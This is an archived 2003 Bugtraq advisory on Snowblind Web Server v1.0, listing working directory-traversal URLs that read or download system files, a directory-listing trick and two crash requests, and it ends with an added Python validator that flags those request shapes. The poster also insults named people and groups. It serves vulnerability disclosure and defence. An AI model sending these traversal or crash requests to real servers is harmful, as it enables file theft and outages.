Message-ID: <3EC52E4B.000015.01393@pantene.yandex.ru>
Date: Fri, 16 May 2003 22:30:35 +0400 (MSD)
From: "euronymous" <just-a-user@...dex.ru>
To: bugtraq@...urityfocus.com, vuln@...urity.nnov.ru
Subject: Snowblind Web Server: multiple issues
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: Snowblind Web Server: multiple issues
product: Snowblind Web Server v1.0
vendor: www.snowblind.net
risk: high
date: 05/16/2k3
tested platform: Windows 98 Second Edition
discovered by: euronymous /F0KP
advisory urls: http://f0kp.iplus.ru/bz/022.en.txt
http://f0kp.iplus.ru/bz/022.ru.txt
contact email: euronymous@...us.ru
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
description
-----------
i have found a couple of issues in this http-server. they
are: directory traversal and DoS attacks.

directory traversal
-------------------
1. you can read and download any file outside the webroot:

   http://hostname/../../windows/system.ini
   or
   http://hostname/internal.sws?../../windows/system.ini

2. you can also download any binary file in this manner:

   http://hostname/internal.sws?../../windows/calc.exe

   this request will download the program file calc.exe under
   the name internal.sws

   http://hostname/internal.sws?sws.exe

   downloads the webserver itself )).

3. directory listing outside the webroot.

   note: this bug works only if `Allow directory
   listings' is turned on [ it is on by default ].

   http://hostname/.../

   will print the contents of the root directory on that disk
   drive.

Denial of Service
-----------------
1. this url will crash the webserver:

   http://localhost/</

2. if you send a GET request that contains >=219
   characters, you will crash the server.

   request example:

   GET /fff[ x 129 ]ffff HTTP/1.0

shouts: DWC, DHG, NetPoison, HUNGOSH, security.nnov.ru,
N0b0d13s Team and all russian security guyz!!
to kate especially ))
hates: slavomira and other dirty ppl in *.kz $#%&^!
k0dsweb lamers team == yeah, i really __HATE__ yours!!
================
im not a lame,
not yet a hacker
================
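
Added example, not part of the original advisory or of Snowblind's code: a Python sketch of the request-line checks a server would need in order to refuse the request shapes listed above (dot segments in the path or in the query string, `...` segments, `<` in the path, over-long request lines). The 200-character cap, the function names and the sample request lines are assumptions constructed for illustration.

```python
from urllib.parse import unquote

MAX_REQUEST_LINE = 200          # assumed cap, below the 219 characters named in the advisory
BAD_NAME_CHARS = set('<>:"|*')  # characters that are not valid in Windows file names


def _dot_runs(value):
    """Segments made only of two or more dots ('..', '...') after percent-decoding."""
    decoded = unquote(value).replace("\\", "/")
    return [seg for seg in decoded.split("/") if len(seg) >= 2 and set(seg) == {"."}]


def check_request_line(line):
    """Return the reasons to refuse a request line; an empty list means accept."""
    reasons = []
    if len(line) > MAX_REQUEST_LINE:
        reasons.append("request line too long")
    parts = line.split(" ")
    if len(parts) != 3 or not parts[1].startswith("/") or not parts[2].startswith("HTTP/"):
        return reasons + ["malformed request line"]
    # The advisory shows the query string being used as a file name, so check it too.
    path, _, query = parts[1].partition("?")
    if _dot_runs(path):
        reasons.append("dot segment in path")
    if _dot_runs(query):
        reasons.append("dot segment in query")
    if BAD_NAME_CHARS & set(unquote(path)):
        reasons.append("illegal file name character")
    return reasons


# Constructed request lines shaped like the ones in the advisory, plus one benign request.
SAMPLES = [
    "GET /index.html HTTP/1.0",
    "GET /../../windows/system.ini HTTP/1.0",
    "GET /internal.sws?../../windows/system.ini HTTP/1.0",
    "GET /.../ HTTP/1.0",
    "GET /</ HTTP/1.0",
    "GET /" + "f" * 219 + " HTTP/1.0",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample[:60], "->", check_request_line(sample) or "accept")
```

Checking the decoded form and treating any run of two or more dots as a traversal segment covers the `...` case, which a check for `..` alone would miss.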